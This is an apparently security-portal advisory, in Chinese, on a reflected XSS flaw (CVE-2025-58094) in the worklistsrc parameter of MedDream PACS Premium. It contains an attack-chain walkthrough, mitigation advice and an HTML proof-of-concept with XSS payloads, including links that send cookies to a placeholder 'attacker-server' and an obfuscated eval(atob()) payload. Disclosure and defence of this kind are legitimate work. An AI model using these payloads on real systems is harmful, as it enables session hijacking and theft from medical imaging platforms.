CVE-2025-58094 MedDream PACS Premium config.php 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-58094

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MedDream PACS Premium 7.3.6.870

漏洞概述

CVE-2025-58094是Cisco Talos情报团队发现的应用安全漏洞，存在于MedDream PACS Premium 7.3.6.870版本的config.php文件中。该漏洞为多次反射型跨站脚本（Multiple Reflected XSS）漏洞，攻击者可以通过构造恶意的URL链接，利用worklistsrc参数注入任意JavaScript代码。当受害者点击攻击者提供的恶意链接时，浏览器会执行注入的恶意脚本，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于该漏洞需要用户交互（点击恶意链接），且不影响系统可用性，因此CVSS评分为6.1，属于中危级别。漏洞影响产品的医学影像存档与传输系统（PACS）功能，该系统通常用于医疗机构管理医学影像数据。

技术细节

该漏洞为反射型XSS漏洞，存在于MedDream PACS Premium的config.php文件中的worklistsrc参数。反射型XSS的原理是：应用程序将用户输入作为查询参数直接包含在响应页面中，且未对输入进行充分的过滤或转义。当用户访问包含恶意脚本的URL时，服务器将未经处理的输入反射回浏览器，浏览器将其作为HTML/JavaScript执行。攻击者通过构造如?worklistsrc=<script>alert(document.cookie)</script>的恶意URL，诱导用户点击。由于该参数直接嵌入到页面输出中，恶意JavaScript代码会在受害者浏览器上下文中执行，可窃取Cookie、会话令牌或其他敏感信息。攻击成功需要满足以下条件：1）攻击者创建恶意URL；2）诱导受害者点击该链接；3）受害者在浏览器中打开链接。防御措施包括对所有用户输入进行输入验证和输出编码。

攻击链分析

STEP 1

侦察阶段

攻击者收集目标信息，确定使用MedDream PACS Premium系统，通过分析发现config.php文件存在反射型XSS漏洞

STEP 2

恶意URL构造

攻击者构造包含恶意JavaScript代码的URL，使用worklistsrc参数注入XSS payload，如<script>alert(document.cookie)</script>

STEP 3

社会工程攻击

攻击者通过钓鱼邮件、即时通讯或其他方式诱导目标用户点击恶意链接，需要用户交互才能触发漏洞

STEP 4

漏洞触发

受害者点击恶意链接后，浏览器向服务器发送请求，服务器将未过滤的worklistsrc参数值反射回响应页面

STEP 5

恶意代码执行

浏览器将反射的恶意脚本作为HTML/JavaScript执行，在受害者浏览器上下文中运行，可窃取Cookie、会话信息等

STEP 6

后续攻击

攻击者利用窃取的会话信息劫持用户会话，执行进一步的攻击如数据窃取、权限提升或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-58094 PoC - MedDream PACS Premium Reflected XSS -->
<!-- Target: MedDream PACS Premium 7.3.6.870 -->
<!-- Parameter: worklistsrc -->
<!-- Attack Type: Reflected XSS -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-58094 PoC</title>
</head>
<body>
    <h1>CVE-2025-58094 - MedDream PACS Premium XSS PoC</h1>
    
    <!-- Basic XSS PoC - Cookie Stealing -->
    <h2>Basic XSS Test</h2>
    <a href="http://target-server/config.php?worklistsrc=<script>alert('XSS')</script>" target="_blank">
        Click to Test Basic XSS
    </a>
    
    <!-- Cookie Theft PoC -->
    <h2>Cookie Theft PoC</h2>
    <a href="http://target-server/config.php?worklistsrc=<script>document.location='http://attacker-server/steal.php?cookie='+document.cookie</script>" target="_blank">
        Click to Test Cookie Theft
    </a>
    
    <!-- Session Hijacking PoC -->
    <h2>Session Hijacking PoC</h2>
    <a href="http://target-server/config.php?worklistsrc=<img src=x onerror='fetch("http://attacker-server/log?data="+btoa(document.cookie))' >" target="_blank">
        Click to Test Session Hijacking
    </a>
    
    <!-- DOM-based XSS PoC -->
    <h2>DOM-based XSS Test</h2>
    <a href="http://target-server/config.php?worklistsrc=<svg/onload=eval(atob('YWxlcnQoJ1hTUycpOw=='))>" target="_blank">
        Click to Test DOM XSS
    </a>
    
    <script>
        // Auto-generate malicious URLs
        const baseUrl = 'http://target-server/config.php';
        const payloads = [
            '<script>alert(document.domain)</script>',
            '<img src=x onerror=alert(1)>',
            '<svg onload=alert(1)>',
            'javascript:alert(document.cookie)',
            '<iframe src="javascript:alert(document.cookie)">'
        ];
        
        console.log('Malicious URL Examples:');
        payloads.forEach((payload, index) => {
            const maliciousUrl = `${baseUrl}?worklistsrc=${encodeURIComponent(payload)}`;
            console.log(`Payload ${index + 1}: ${maliciousUrl}`);
        });
    </script>
</body>
</html>

影响范围

MedDream PACS Premium 7.3.6.870

防御指南

临时缓解措施

立即采取以下临时缓解措施：1）限制对config.php的直接访问，通过防火墙或WAF规则过滤包含script、img、svg等HTML标签的worklistsrc参数；2）实施输入验证，对特殊字符<、>、"、'、/进行过滤或编码；3）启用Web应用防火墙（WAF）规则检测和阻止XSS攻击特征；4）临时禁用或限制worklistsrc参数功能，直到官方补丁发布；5）加强用户安全意识培训，提醒用户不要点击来源不明的链接；6）监控应用日志，及时发现异常请求和攻击尝试。